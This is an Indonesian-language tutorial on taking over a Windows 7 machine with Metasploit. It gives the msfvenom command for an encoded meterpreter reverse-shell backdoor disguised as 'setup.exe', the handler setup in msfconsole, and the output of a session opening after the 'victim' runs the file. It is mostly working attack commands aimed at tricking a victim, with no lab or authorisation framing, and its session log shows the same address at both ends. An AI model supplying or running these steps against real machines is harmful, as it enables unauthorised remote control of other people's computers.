Tutorial kali ini saya akan memberikan panduan bagaimana cara menghack windows 7 dengan metasploit yang ada di kali linux. Metasploit merupakan alat penetration testing framework yang memberikan kemudahan untuk mengeksploitasi sistem.
1. Pertama kita membuat backdoor dengan msfvenom
root@kali:# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.0.1 LPORT=443 -f exe > setup.exe2. Kedua Buka metasploit di terminal lalu ketikan msfconsole
root@kali:# msfconsole
_____ _____ _______ _______ _______ ______ __ __ _ _ ___ _ _
|_ _| __ \ / ____\ \ / / ____|__ __| ____| \/ | || | / _ \| || |
| | | | | | (___ \ \_/ / (___ | | | |__ | \ / | || |_| | | | || |_
| | | | | |\___ \ \ / \___ \ | | | __| | |\/| |__ _| | | |__ _|
_| |_| |__| |____) | | | ____) | | | | |____| | | | | | | |_| | | |
|_____|_____/|_____/ |_| |_____/ |_| |______|_| |_| |_| \___/ |_|
=[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
+ -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
+ -- --=[ 330 payloads - 32 encoders - 8 nops ]
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.0.1
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.1:443
[*] Starting the payload handler...
3. Setelah itu korban mengeklik backdoor tersebut dan tereksekusi sampai mendapatkan meterpreter
[*] Started reverse handler on 192.168.0.1:443
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (192.168.0.1:443 -> 192.168.0.1:443) at 2015-06-21 21:32:52 +0300
meterpreter >